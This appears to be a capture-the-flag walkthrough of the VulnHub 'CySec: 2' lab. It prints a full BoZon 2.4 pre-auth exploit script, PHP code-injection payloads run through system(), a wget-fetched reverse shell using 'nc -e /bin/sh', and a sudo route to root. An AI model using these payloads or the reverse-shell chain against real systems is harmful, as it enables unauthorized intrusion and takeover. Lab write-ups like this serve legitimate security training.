VulnHub: CySec: 2

Today we will take a look at Vulnhub: CySec 2. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

Press enter or click to view image in full size

• Network scan

Command: sudo nmap -p- -sV -sC -oN nmap/open -- open 192.168.0.11522/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b1:00:57:62:be:65:42:f0:ba:3e:c1:47:c5:8d:fb:db (RSA)
|   256 5a:9b:20:89:19:c3:ab:d4:be:06:84:de:e4:30:d4:37 (ECDSA)
|_  256 08:4b:f3:f8:88:7e:1a:6b:e1:8d:7f:14:60:10:7a:98 (ED25519)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.41 (Ubuntu)
3306/tcp  open  mysql   MySQL (unauthorized)
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|_    HY000

• Web

When we look at the source of the page, we see a sentence in encrypted form. Let’s decode it with CyberChef.

view-source:http://192.168.0.115/

Zm9yIGZpcnN0IGZsYWcgY2hlY2sgL2NoYWxsZW5nZS9pbmRleC5waHAKZm9yIHNlY29uZCBmbGFnIGNoZWNrIC9FeG9saXQvaW5kZXgucGhw

for first flag check /challenge/index.php
for second flag check /Exolit/index.php

When we look at /Exolit/index.php, we see that BoZon is version 2.4. After searching, we found the exploit.

• Exploit

import urllib,urllib2,time
#Bozon v2.4 (bozon.pw/en/) Pre-Auth Remote Exploit
#Discovery / credits: John Page - Hyp3rlinx/Apparition
#hyp3rlinx.altervista.org
#Exploit: add user account | run phpinfo() command
#=========================================================
EXPLOIT=0
IP=raw_input("[Bozon IP]>")
EXPLOIT=int(raw_input("[Exploit Selection]> [1] Add User 'Apparition', [2] Execute phpinfo()"))
if EXPLOIT==1:
    CMD="Apparition"
else:
    CMD='"];$PWN=''phpinfo();//''//"'
if EXPLOIT != 0:
   url = 'http://'+IP+'/Exolit/index.php'
   data = urllib.urlencode({'creation' : '1', 'login' : CMD, 'pass' : 'abc123', 'confirm' : 'abc123', 'token' : ''})
   req = urllib2.Request(url, data)
   response = urllib2.urlopen(req)
if EXPLOIT==1:
    print 'Apparition user account created! password: abc123'
else:
    print "Done!... waiting for phpinfo"
    time.sleep(0.5)
    print response.read()

If we launch the operation, we must first register. So let’s select 1, create a user and log in

└─$ python2 exploit.py
[Bozon IP]>192.168.0.115
[Exploit Selection]> [1] Add User 'Apparition', [2] Execute phpinfo()1
Apparition user account created! password: abc123

Let’s enter.

username: Apparition
password: abc123

When we refresh the page after selecting the second operation, we encounter such a page.

Press enter or click to view image in full size

This is the command that does this.

CMD='"];$PWN=''phpinfo();//''//"'

Let’s use it.

CMD='"];system("ls -la");//''//"'

After changing this section, restart exploit and select the 2nd one. Then refresh the page.

The code has been executed

“You can contact me if you have any questions.”

• Reverse shell

Let’s prepare such a useful load called reverse.sh

#!/bin/bash 
nc -e /bin/sh YourİP 1234

Now let’s load it on the other side

Local machine

Command: python3 -m http.server 80

In exploit

CMD='"];system("wget http://YourIP/reverse.sh");//''//"'CMD='"];system("bash reverse.sh");//''//"'

Local machine

nc -nvlp 1234

After listening, let’s refresh the page and get the shell.

Press enter or click to view image in full size

• CySec2

If we look at the flag.txt file, we can find the password for cysec2.

Command: cat flag.txt

username = cysec2 
password =  $^WAhuy457i6kj

Command: su cysec2

• Root

Check privileges

Command: sudo -l

(ALL : ALL) ALL

Command: sudo su

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”